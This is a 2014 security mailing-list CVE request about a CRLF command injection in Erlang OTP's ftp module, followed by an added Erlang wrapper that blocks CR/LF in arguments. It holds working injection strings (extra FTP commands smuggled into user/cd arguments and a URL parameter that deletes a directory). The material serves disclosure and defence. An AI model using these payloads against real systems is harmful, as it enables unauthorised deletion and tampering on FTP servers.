Message-ID: <CAM4=iJ2tXAuMETRMLqJAyKbzYTY7R3iN_P9o6DxCUCr+HXdDLA@mail.gmail.com>
Date: Tue, 28 Jan 2014 22:48:41 +0100
From: Seba <argos83@...il.com>
To: cve-assign@...re.org, oss-security@...ts.openwall.com
Subject: CVE Request: Erlang OTP - ftp module - FTP Command Injection

Hi,

This has been reported to the erlang-bugs mailing list:
http://erlang.org/pipermail/erlang-bugs/2014-January/003998.html

There is an FTP Command Injection vulnerability in the "ftp" module. All
those functions that write any string argument in the control socket seem
to be vulnerable:

user/3
user/4
account/2
cd/2
ls/2
nlist/2
rename/3
delete/2
mkdir/2
rmdir/2
recv/2
recv/3
recv_bin/2
recv_chunk_start/2
send/3
send_bin/3
send_chunk_start/2
append_chunk_start/2
append/2
append/3
append_bin/3

Vulnerability Description
-------------------------

By injecting a \r\n sequence followed by a new command in a function
argument you get the ftp module to write the whole string in the socket.
E.g. the following erlang shell session:

1> inets:start().
ok
2> {ok, Pid} = inets:start(ftpc, [{host, "127.0.0.1"}]).
{ok,<0.46.0>}
3> ftp:user(Pid, "anonymous", "password\r\nCWD pub\r\nMKD new_dir").
ok
4> ftp:cd(Pid, "/pub\r\nRMD new_dir\r\nPASV").
ok

Generates the following FTP session:

FTP command: Client "127.0.0.1", "USER anonymous"
FTP response: Client "127.0.0.1", "331 Please specify the password."
FTP command: Client "127.0.0.1", "PASS <password>"
FTP response: Client "127.0.0.1", "230 Login successful."
FTP command: Client "127.0.0.1", "CWD pub"
FTP response: Client "127.0.0.1", "250 Directory successfully changed."
FTP command: Client "127.0.0.1", "MKD new_dir"
FTP response: Client "127.0.0.1", "257 "/pub/new_dir" created"
FTP command: Client "127.0.0.1", "CWD /pub"
FTP response: Client "127.0.0.1", "250 Directory successfully changed."
FTP command: Client "127.0.0.1", "RMD new_dir"
FTP response: Client "127.0.0.1", "250 Remove directory operation successful."
FTP command: Client "127.0.0.1", "PASV"
FTP response: Client "127.0.0.1", "227 Entering Passive Mode (127,0,0,1,130,161)."

Attack Scenario Example
-----------------------

A web server allows users to navigate and download documents. Internally
the web server connects to a private ftp server using the OTP "ftp"
module. An attacker might take advantage of the vulnerability to execute
actions that aren't supposed to be exposed. E.g. delete a directory by
requesting:

http://www.example.com/list_dir.yaws?dir=/docs/%0d%0aRMD+/docs

Tested on
---------

- Erlang OTP: R15B03
- Ubuntu 12.04 x86_64
- FTP Server: vsftpd

Mitigation
----------

Until this is fixed and the proper sanitization is implemented within the
ftp module, string arguments should get "\r" and "\n" removed before being
passed to these functions.

Sebastián Tello
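A defensive wrapper for the affected calls, added here as an example; it is not part of the report above, of OTP, or of any project's code. The module name ftp_guard, its function names and the sample inputs are assumptions; the ftp:user/3, ftp:cd/2, ftp:delete/2, ftp:mkdir/2 and ftp:rmdir/2 functions it wraps are the real OTP ones listed in the report, and the Pid is the one returned by inets:start(ftpc, ...). The module offers both the removal workaround the report suggests and a stricter reject-on-CR/LF check, and its demo/0 shows the check applied to the decoded form of the query parameter from the attack scenario.

```erlang
%% ftp_guard.erl -- added example; not part of the original report or of OTP.
%% Guards the OTP ftp calls named in the report so that a string argument
%% containing CR or LF never reaches the control socket, where the server
%% would read the text after the line break as further commands.
-module(ftp_guard).
-export([check_arg/1, strip_crlf/1, user/3, cd/2, delete/2, mkdir/2,
         rmdir/2, demo/0]).

%% RFC 959 terminates a command line with CRLF; a bare LF is rejected as
%% well because many servers accept it as a terminator.
-define(IS_EOL(C), (C =:= $\r orelse C =:= $\n)).

%% check_arg/1 -> ok | {error, crlf_in_argument}
%% Accepts Erlang strings (lists) and binaries.
check_arg(Arg) when is_binary(Arg) ->
    check_arg(binary_to_list(Arg));
check_arg(Arg) when is_list(Arg) ->
    case lists:any(fun(C) -> ?IS_EOL(C) end, Arg) of
        true  -> {error, crlf_in_argument};
        false -> ok
    end.

%% strip_crlf/1 is the workaround the report describes: remove "\r" and
%% "\n". Rejecting is the better default, because a stripped value silently
%% names a different path than the caller asked for and hides an attempt
%% that should have been logged.
strip_crlf(Arg) when is_binary(Arg) ->
    list_to_binary(strip_crlf(binary_to_list(Arg)));
strip_crlf(Arg) when is_list(Arg) ->
    [C || C <- Arg, not ?IS_EOL(C)].

%% Guarded wrappers with the same signatures as the ftp module functions.
%% Every string argument is checked before the real call is made; a tainted
%% argument returns {error, crlf_in_argument} without touching the connection.
user(Pid, User, Pass) -> guard([User, Pass], fun() -> ftp:user(Pid, User, Pass) end).
cd(Pid, Dir)          -> guard([Dir],        fun() -> ftp:cd(Pid, Dir) end).
delete(Pid, File)     -> guard([File],       fun() -> ftp:delete(Pid, File) end).
mkdir(Pid, Dir)       -> guard([Dir],        fun() -> ftp:mkdir(Pid, Dir) end).
rmdir(Pid, Dir)       -> guard([Dir],        fun() -> ftp:rmdir(Pid, Dir) end).

%% guard/2: run check_arg/1 over every argument; stop at the first failure.
guard(Args, Call) ->
    Check = fun(_, {error, _} = Failed) -> Failed;
               (Arg, ok)                -> check_arg(Arg)
            end,
    case lists:foldl(Check, ok, Args) of
        ok    -> Call();
        Error -> Error
    end.

%% demo/0 runs the checks on constructed inputs (assumed values), including
%% the decoded form of the query string from the report's attack scenario.
%% In a web front end the check must run on the *decoded* parameter: the raw
%% query "dir=/docs/%0d%0aRMD+/docs" contains no CR/LF until %0d%0a is decoded.
demo() ->
    ok                        = check_arg("/docs/reports"),
    {error, crlf_in_argument} = check_arg("/docs/\r\nRMD /docs"),
    {error, crlf_in_argument} = check_arg(<<"password\nCWD pub">>),
    "/docs/RMD /docs"         = strip_crlf("/docs/\r\nRMD /docs"),
    ok.
```

Compile with erlc ftp_guard.erl and call ftp_guard:demo() from the shell to exercise the checks without a server; then replace direct ftp:cd/2, ftp:user/3 and similar calls in application code with the ftp_guard equivalents. The wrappers return {error, crlf_in_argument} rather than raising, so callers can log the refused value as a suspicious request instead of treating it as a transport failure.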